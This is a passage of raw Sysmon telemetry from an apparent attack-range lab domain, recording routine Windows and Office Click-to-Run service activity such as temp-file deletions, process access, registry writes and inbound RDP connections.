14:53:39.894{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\OfficeC2R49DF76BF-A14D-44CB-9027-1A8929C06524\BIT629E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.847{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\OfficeC2R49DF76BF-A14D-44CB-9027-1A8929C06524\BIT629E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.847{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.847{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Windows\Temp\s641033CheckReachable09D9135F-5C8D-4BA0-810C-3CF8327D0E5CMD5=69691C7BDCC3CE6D5D8A1361F22D04AC,SHA256=08F271887CE94707DA822D5263BAE19D5519CB3614E0DAEDC4C7CE5DAB7473F1,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x4d 23542300x800000000000000063344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.847{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT624F.tmpMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.816{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT624F.tmpMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.816{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT624F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000063341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.073{A7A01FEF-B626-607E-1600-00000000BB01}1540officecdn.microsoft.com.edgesuite.net0type: 5 officecdn.microsoft.com.edgesuite.net.globalredir.akadns.net;type: 5 a1737.dspw65.akamai.net;::ffff:2.16.106.224;::ffff:2.16.106.194;C:\Windows\System32\svchost.exe 23542300x800000000000000063340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.769{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\Temp\BIT624F.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.769{A7A01FEF-B626-607E-1600-00000000BB01}15404372C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.706{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=238C0FFE5D67FB55FDD4AF906CB8BF60,SHA256=D7F8EFCAE4D98E021AC834B52D98A83962F9D736D12C95696F002256CECEA5A7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:39.675{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe2021-04-20 14:53:39.675 11241100x800000000000000063336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:39.660{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe2021-04-20 14:53:39.660 10341000x800000000000000063335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.503{A7A01FEF-B624-607E-0A00-00000000BB01}8526268C:\Windows\system32\services.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.488{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.488{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.488{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.425{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000063325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.426{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe16.0.13127.21210Microsoft Office Click-to-Run (SxS)Microsoft OfficeMicrosoft CorporationOfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=109DDC7C83BC3AEB49A647A89BD6362A,SHA256=A6F2C3A6E01E6859D00DAC8344560F840EB0AE385CF38FA88E4B91F762317643,IMPHASH=AFC358F4704431026A38B639D4132AC6{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 23542300x800000000000000049290Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:39.635{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFCC3BDB2CF5591A5B72574CE965A9DB,SHA256=6F67220B40FBFAC34E34D20F655DC1672BC881CEEC95F8E7A43483E260E0200D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049289Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:37.027{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59288-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049288Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:36.909{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56329-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 13241300x800000000000000063324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\Security\SecurityBinary Data 13241300x800000000000000063323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\FailureActionsBinary Data 13241300x800000000000000063322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\Description‪Manages resource coordination, background streaming, and system integration of Microsoft Office products and their related updates. This service is required to run during the use of any Microsoft Office program, during initial streaming installation and all subsequent updates.‬ 13241300x800000000000000063321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\ObjectNameLocalSystem 13241300x800000000000000063320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\DisplayNameMicrosoft Office Click-to-Run Service 13241300x800000000000000063319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1031,T1050SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\ImagePath"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service 13241300x800000000000000063318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\ErrorControlDWORD (0x00000001) 13241300x800000000000000063317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1031,T1050SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\StartDWORD (0x00000002) 13241300x800000000000000063316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:53:39.410{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ClickToRunSvc\TypeDWORD (0x00000010) 10341000x800000000000000063315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.410{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.410{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.394{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44843096C:\Program Files\Common 